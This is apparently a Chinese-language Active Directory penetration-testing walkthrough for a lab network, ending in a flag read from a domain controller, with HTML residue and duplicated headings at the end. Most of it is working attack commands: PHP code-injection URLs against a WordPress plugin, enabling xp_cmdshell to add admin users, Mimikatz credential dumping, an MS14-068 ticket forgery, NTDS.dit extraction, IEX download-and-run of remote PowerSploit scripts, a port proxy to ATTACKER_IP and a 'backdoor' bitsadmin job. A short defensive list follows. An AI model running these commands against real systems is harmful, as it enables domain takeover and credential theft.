Windows Active Directory 渗透测试指南<\/h1>

1. 目标描述<\/h2>

目标是从 Windows 域控制器(DC)的 C:\file.sys 文件中读取 Flag。目标网络包含以下主机：<\/p>

http:\/\/10.1.222.203 (起点)<\/li>
10.1.222.200<\/li>
10.1.222.201<\/li>

10.1.222.202 (Windows DC)<\/li> <\/ul>

2. 攻击路径<\/h2>
攻击路径如下：
10.1.222.203 → 10.1.222.200 → 10.1.222.201 → 10.1.222.202<\/p>

3. 详细攻击步骤<\/h2>

3.1 攻击 10.1.222.203 (WordPress)<\/h3>

识别漏洞<\/strong>：<\/p>

使用 WPScan 扫描 WordPress 站点<\/li>
发现 CM Download Manager 插件存在代码注入漏洞 (CVE-2014-8877)<\/li> <\/ul> <\/li>

利用代码注入漏洞<\/strong>：<\/p>
http:\/\/10.1.222.203\/cmdownloads\/?CMDsearch=".print_r(scandir('.'))." http:\/\/10.1.222.203\/cmdownloads\/?CMDsearch=".print_r(file_get_contents('wp-config.php'))." <\/code><\/pre> <\/li> 获取数据库凭据<\/strong>：<\/p> 从 wp-config.php 中提取： DB_HOST: 10.1.222.200<\/li> DB_USER: root<\/li> DB_PASSWORD: Xd1moYqFr<\/li> <\/ul> <\/li> <\/ul> <\/li> <\/ol> 3.2 攻击 10.1.222.200 (SQL Server)<\/h3> 端口扫描<\/strong>：<\/p> 发现 1433 (SQL Server) 端口开放<\/li> <\/ul> <\/li> 连接 SQL Server<\/strong>：<\/p> 使用 sa\/Xd1moYqFr 成功登录<\/li> <\/ul> <\/li> 启用 xp_cmdshell<\/strong>：<\/p> EXEC<\/span> sp_configure 'show advanced options'<\/span>,1<\/span> <\/span><\/span>RECONFIGURE <\/span><\/span>EXEC<\/span> sp_configure 'xp_cmdshell'<\/span>,1<\/span> <\/span><\/span>RECONFIGURE <\/span><\/span><\/code><\/pre><\/li> 执行系统命令<\/strong>：<\/p> EXEC<\/span> xp_cmdshell 'whoami'<\/span> #<\/span> 确认权限为<\/span> NT AUTHORITY\<\/span>SYSTEM<\/span> <\/span><\/span>EXEC<\/span> xp_cmdshell 'wmic useraccount get name,sid'<\/span> #<\/span> 查看用户<\/span> <\/span><\/span>EXEC<\/span> xp_cmdshell 'net user hacker Password123 \/add'<\/span> #<\/span> 添加用户<\/span> <\/span><\/span>EXEC<\/span> xp_cmdshell 'net localgroup administrators hacker \/add'<\/span> #<\/span> 提升为管理员<\/span> <\/span><\/span><\/code><\/pre><\/li> 使用 Mimikatz 提取凭据<\/strong>：<\/p> privilege::debug sekurlsa::logonpasswords <\/code><\/pre> 获取管理员密码: 6GbA6Crdw<\/li> <\/ul> <\/li> <\/ol> 3.3 攻击 10.1.222.201<\/h3> 使用获取的凭据登录<\/strong>：<\/p> 用户名: Administrator<\/li> 密码: 6GbA6Crdw<\/li> <\/ul> <\/li> 发现 MS14-068 漏洞利用条件<\/strong>：<\/p> 域: PENTEST.COM<\/li> 用户: master<\/li> SID: S-1-5-21-30580861-1793299886-3410204933-1008<\/li> <\/ul> <\/li> 使用 PyKEK 利用 MS14-068<\/strong>：<\/p> python ms14-068.py -u master@PENTEST.COM -s S-1-5-21-30580861-1793299886-3410204933-1008 -d DC.PENTEST.COM <\/code><\/pre> 输入密码后生成 TGT 票据<\/li> <\/ul> <\/li> 导入票据<\/strong>：<\/p> mimikatz # kerberos::ptc TGT_master@PENTEST.COM.ccache <\/code><\/pre> <\/li> 验证域管理员权限<\/strong>：<\/p> net user \/domain net group "DOMAIN ADMINS" \/domain <\/code><\/pre> <\/li> <\/ol> 3.4 攻击 10.1.222.202 (Windows DC)<\/h3> 访问域控制器<\/strong>：<\/p> net use \\DC.PENTEST.COM\ipc$ dir \\DC.PENTEST.COM\c$ <\/code><\/pre> <\/li> 读取 Flag 文件<\/strong>：<\/p> type k:\file.sys <\/code><\/pre> 获取 Flag: 4b329655c2275d7c956083dc899b1c89<\/li> <\/ul> <\/li> 添加域管理员<\/strong>：<\/p> net user demo pasPAS1234~ \/add \/domain net group "DOMAIN ADMINS" demo \/add \/domain <\/code><\/pre> <\/li> <\/ol> 4. 高级技术详解<\/h2> 4.1 从域控制器提取凭据的方法<\/h3> 方法1：SYSVOL 和组策略首选项(GPP)中的密码<\/h4> 搜索包含密码的 XML 文件：<\/p> \\SYSVOL<DOMAIN>\Policies\ <\/code><\/pre> 查找 groups.xml, scheduledtasks.xml, Services.xml 等文件<\/p> <\/li> 解密 cpassword 值：<\/p> 使用 gpp_password_decrypt.py 或 PowerShell：<\/li> <\/ul> IEX (New-Object Net.WebClient).DownloadString("https:\/\/raw.githubusercontent.com\/PowerShellMafia\/PowerSploit\/master\/Exfiltration\/Get-GPPPassword.ps1"<\/span>) <\/span><\/span>Get-GPPPassword <\/span><\/span><\/code><\/pre><\/li> <\/ol> 方法2：使用 Mimikatz 提取 LSASS 内存<\/h4> 直接提取：<\/p> IEX (New-Object Net.WebClient).DownloadString("https:\/\/raw.githubusercontent.com\/PowerShellMafia\/PowerSploit\/master\/Exfiltration\/Invoke-Mimikatz.ps1"<\/span>) <\/span><\/span>Invoke-Mimikatz <\/span><\/span><\/code><\/pre><\/li> 从内存转储提取：<\/p> 使用任务管理器转储 LSASS 进程内存<\/li> 使用 Mimikatz 分析：<\/li> <\/ul> sekurlsa::minidump C:\path\to\lsass.DMP sekurlsa::logonpasswords <\/code><\/pre> <\/li> <\/ol> 方法3：使用 NTDSUtil 提取 NTDS.dit<\/h4> 创建 IFM 集：<\/p> ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q <\/code><\/pre> <\/li> 提取哈希：<\/p> 使用 secretsdump.py：<\/li> <\/ul> secretsdump.py -system SYSTEM -security SECURITY -ntds ntds.dit LOCAL <\/code><\/pre> <\/li> <\/ol> 方法4：使用 VSS 卷影副本<\/h4> 创建卷影副本：<\/p> vssadmin Create Shadow \/for=C: <\/code><\/pre> <\/li> 复制文件：<\/p> copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\ copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\ <\/code><\/pre> <\/li> 删除卷影副本：<\/p> vssadmin Delete Shadows \/For=C: <\/code><\/pre> <\/li> <\/ol> 方法5：使用 NinjaCopy<\/h4> Invoke-NinjaCopy -Path "C:\Windows\NTDS\NTDS.dit"<\/span> -ComputerName DC -localDestination "C:\temp\NTDS.dit"<\/span> <\/span><\/span><\/code><\/pre>5. 常用 Windows AD 命令参考<\/h2> 网络和域信息<\/h3> net view \/domain net view \/domain:DOMAINNAME net time \/domain net config <\/code><\/pre> 用户和组管理<\/h3> net user \/domain net localgroup administrators net group \/domain net group "Domain Admins" \/domain wmic useraccount list full <\/code><\/pre> 系统信息<\/h3> systeminfo wmic qfe get hotfixid wmic bios ipconfig \/all netstat -ano tasklist \/v <\/code><\/pre> 防火墙和网络<\/h3> netsh firewall show config netsh int portproxy v4tov4 listenport=80 connecthost=ATTACKER_IP connectport=80 route print arp -a <\/code><\/pre> 其他有用命令<\/h3> FOR \/F %f in ('dir \/b \/s C:\') do find \/I "password" %f gpresult \/Z bitsadmin \/create backdoor <\/code><\/pre> 6. 防御建议<\/h2> 及时修补 MS14-068 等已知漏洞<\/li> 禁用或限制 xp_cmdshell 等危险 SQL 功能<\/li> 监控异常账户创建和权限提升<\/li> 保护 SYSVOL 共享，删除包含密码的 GPP 文件<\/li> 限制域管理员账户的使用范围<\/li> 启用 LSASS 保护机制<\/li> 监控 NTDS.dit 文件的异常访问<\/li> 实施严格的密码策略和定期轮换<\/li> <\/ol> 通过以上步骤和技术，攻击者可以逐步提升权限，最终获取域控制器的完全控制权。防御方应全面了解这些攻击技术，才能有效保护 Active Directory 环境的安全。<\/p>

Windows Active Directory 渗透测试指南<\/h1>

2. 攻击路径<\/h2> 攻击路径如下： 10.1.222.203 → 10.1.222.200 → 10.1.222.201 → 10.1.222.202<\/p>

3. 详细攻击步骤<\/h2>

4. 高级技术详解<\/h2>

4.1 从域控制器提取凭据的方法<\/h3>

5. 常用 Windows AD 命令参考<\/h2>

2. 攻击路径<\/h2>
攻击路径如下：
10.1.222.203 → 10.1.222.200 → 10.1.222.201 → 10.1.222.202<\/p>